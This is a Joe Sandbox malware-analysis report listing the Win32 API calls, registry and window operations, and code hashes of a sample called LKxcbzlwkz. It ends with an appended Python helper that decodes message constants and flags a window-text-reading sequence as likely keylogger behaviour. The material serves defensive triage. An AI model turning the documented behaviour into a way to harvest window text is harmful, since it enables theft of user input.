• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 327565842-0
                                                                                                                                                                                                                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2095303065-0
                                                                                                                                                                                                                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
• Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
• Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
APIs
• SendMessageW.USER32 ref: 00449598
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
• _wcslen.LIBCMT ref: 0044960D
• _wcslen.LIBCMT ref: 0044961A
• SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$_wcslen$_wcspbrk
• String ID:
• API String ID: 1856069659-0
• Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
• Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
• Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
• Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
• Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
• Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
• Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 142311417-0
                                                                                                                                                                                                                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3087257052-0
                                                                                                                                                                                                                                                            • Opcode ID: f62ed41ea241afa131cc03573afa6ce8baa014cb5768656ceaed1311313165be
                                                                                                                                                                                                                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f62ed41ea241afa131cc03573afa6ce8baa014cb5768656ceaed1311313165be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
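The report prints SendMessageW and ShowWindow arguments as raw hex, so the two API records above (the EnableWindow/ShowWindow function at 00448B5C and the IsWindowVisible/SendMessageW function at 00445879) are easier to triage once the numbers are mapped back to their winuser.h names. The following helper is an added example, not part of the Joe Sandbox report or the sample: it parses the report's "APIs" line format, annotates the message and nCmdShow constants, and flags the length-then-text read (WM_GETTEXTLENGTH 0x0E followed by WM_GETTEXT 0x0D) that 00445879 performs on a visible window. Reading that pattern as window-text harvesting, in line with the keylogger signatures in the report overview, is the example's own interpretation; the two sample records are copied from the page, and the GetWindowLongW index 000000F0 is left undecoded because the report does not show how the argument was rendered.

```python
"""Annotate Joe Sandbox function-level "APIs" lines with the Win32 constants
they pass, and flag the window-text-read sequence seen in this report."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Documented values from winuser.h (assumed complete only for what this page uses).
MESSAGE_NAMES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
                 0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK"}
SHOWWINDOW_NAMES = {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE"}

# "• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893"
# "• Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA"
# "• _wcslen.LIBCMT ref: 004458FB"
API_LINE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw argument strings, "?" when unknown
    ref: int                   # address of the call site
    subcall: Optional[int]     # enclosing subcall function, if any
    note: str = ""             # decoded constant, if any


def _hex_arg(args: List[str], idx: int) -> Optional[int]:
    try:
        return int(args[idx], 16)
    except (IndexError, ValueError):   # missing or "?" argument
        return None


def decode_constant(call: ApiCall) -> str:
    """Map the raw second argument of the calls this page shows to its name."""
    if call.api in ("SendMessageW", "SendMessageA"):
        msg = _hex_arg(call.args, 1)
        if msg is None:
            return ""
        return MESSAGE_NAMES.get(msg, f"msg 0x{msg:04X}")
    if call.api == "ShowWindow":
        cmd = _hex_arg(call.args, 1)
        return "" if cmd is None else SHOWWINDOW_NAMES.get(cmd, f"nCmdShow {cmd}")
    if call.api == "EnableWindow":
        flag = _hex_arg(call.args, 1)
        return "" if flag is None else ("enable" if flag else "disable")
    return ""


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse one record's APIs block; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                       int(m["sub"], 16) if m["sub"] else None)
        call.note = decode_constant(call)
        calls.append(call)
    return calls


def reads_window_text(calls: List[ApiCall]) -> bool:
    """True when the function itself (subcalls excluded) queries a window's text
    length and then fetches the text: the WM_GETTEXTLENGTH / WM_GETTEXT pair."""
    seen_length = False
    for c in calls:
        if c.subcall is not None:
            continue
        if c.note == "WM_GETTEXTLENGTH":
            seen_length = True
        elif c.note == "WM_GETTEXT" and seen_length:
            return True
    return False


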